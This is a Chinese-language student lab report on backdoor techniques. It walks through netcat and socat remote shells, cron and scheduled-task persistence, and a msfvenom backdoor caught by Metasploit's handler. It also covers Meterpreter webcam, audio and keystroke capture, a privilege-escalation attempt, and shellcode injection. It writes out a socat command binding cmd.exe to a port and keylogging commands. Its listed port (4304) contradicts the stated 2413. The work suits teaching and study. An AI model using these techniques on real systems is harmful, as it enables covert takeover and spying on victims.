20192413宗俊豪 2021-2022-2 《網路與系統攻防技術》實驗二實驗報告
20192413 宗俊豪 2021-2022-2 《網路與系統攻防技術》實驗二實驗報告
1.實驗內容
(1)使用netcat獲取主機操作Shell,cron啟動某項任務(任務自定)
(2)使用socat獲取主機操作Shell, 任務計劃啟動
(3)使用MSF meterpreter(或其他軟體)生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機Shell
(4)使用MSF meterpreter(或其他軟體)生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權
(5)使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連線Shell。
2.實驗過程
2.1使用netcat獲取主機操作Shell,cron啟動某項任務
2.1.1 關閉防火牆
2.1.2 查詢主機ip地址
2.1.3 windows 開啟監聽,Linux反彈連線win
2.1.4 在Windows的命令提示行中控制kali的shell,用crontab-e配置cron規則:* * * * * /root/桌面/test.py>>/root/桌面/a.log 2>&1 &
2.1.5 使用一個Python檔案,內部只有print("hello")一條語句並用cron使其每分鐘執行一次將結果記錄在a.log中
2.2 使用socat獲取主機操作Shell, 任務計劃啟動
2.2.1開啟控制面板->系統和安全->管理工具->任務計劃程式,新建任務計劃
2.2.2新建觸發器,設定為工作站鎖定時,並啟用
2.2.3新建操作,在程式或指令碼中選擇所下載的socat.exe檔案路徑,在新增引數中新增tcp-listen:4304 exec:cmd.exe,pty,stderr命令
這個命令可以把cmd.exe繫結到埠2413,同時把cmd.exe的stderr重定向到stdout上
2.2.4鎖定計算機讓新建的任務執行
2.2.5在kali中輸入指令socat - tcp:192.168.10.233:2413,成功獲取主機操作Shell
2.3 使用MSF meterpreter(或其他軟體)生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機Shell
2.3.1使用msfenom生成後門可執行檔案
2.3.2使用ncat將生成的檔案複製到windows中
2.3.3輸入指令msfconsole啟動使用者操作介面
2.3.4設定payload,LHOST,LPORT與生成的20192413_backdoor.exe一致
2.3.5輸入指令exploit執行監聽,在windows中雙擊20192413_backdoor.exe,kali的監聽程序將獲得Win主機的主動連線,並得到遠端控制shell
2.4 使用MSF meterpreter(或其他軟體)生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權
2.4.1獲得目標主機的一段音訊
2.4.2獲取目標主機的攝像頭拍照
2.4.3 輸入指令keyscan_start獲得目標主機的擊鍵記錄,keyscan_dump提取記錄
2.4.4 輸入指令getsystem提權
無法成功提權
2.5使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連線Shell。
2.5.1將實驗一中的pwn1-20192413檔案輸出為elf格式檔案
2.5.2開啟msf控制檯設定Payload、LHOST、LPORT,與生成的20192413pwn檔案一致
2.5.3開啟exploit監聽,並在另一個終端中開啟20192413pwn檔案可獲得反彈連線shell
3.問題及解決方案
-
問題1:在主機雙擊生成的後門檔案後,kali無法獲取主機shell
-
問題1解決方案:生成後門檔案時程式碼中LPORT打成了PORT導致後門檔案無法正常使用,重新生成檔案即可解決
-
問題2:在MSF客戶操作介面使用exploit進行監聽時提示exploit cammand not found
-
問題2解決方案:忘記打use exploit/multi/handler這條指令
-
問題3:在終端中開啟20192413pwn檔案時報錯
-
問題3解決方案:在msf控制檯設定payload時誤將用於linux的payload設為用於windows的,重新設定linux後可正常執行
4.問題回答
(1)例舉你能想到的一個後門進入到你係統中的可能方式?
- 後門一般會隱藏在正常應用程式之中,有的經過修改或破解的軟體也會攜帶後門,有的系統製作者會在系統中故意留下後門。
(2)例舉你知道的後門如何啟動起來(win及linux)的方式?
- 誘騙客戶點選、安裝後自動啟動
(3)Meterpreter有哪些給你映像深刻的功能?
- 每個功能都在之前沒有使用過甚至見過,通過Meterpreter連線主機並控制主機攝像頭的功能給我印象最深刻
(4)如何發現自己的系統有沒有被安裝後門?
- 自己可以通過防毒軟體來檢測一部分後門,網上也有人通過自制入侵防禦系統來發現系統異常
5.學習感悟、思考等
這次實驗是對後門原理的實踐,在實驗中運用到了關於後門設定的一些內容以及netcat、socat和Meterpreter的使用,通過這次實驗見識到了這三個軟體的強大之處,同時也見識到了後門入侵主機攝像頭、鍵盤輸入的危害,對於今後計算機使用過程中可能存在的漏洞也更加警惕。在實驗中需要通過關閉防毒軟體才能順利進行,因此最簡單的後門程式還是有很大的侷限性,對於之後的免殺原理也有了更加濃厚的興趣。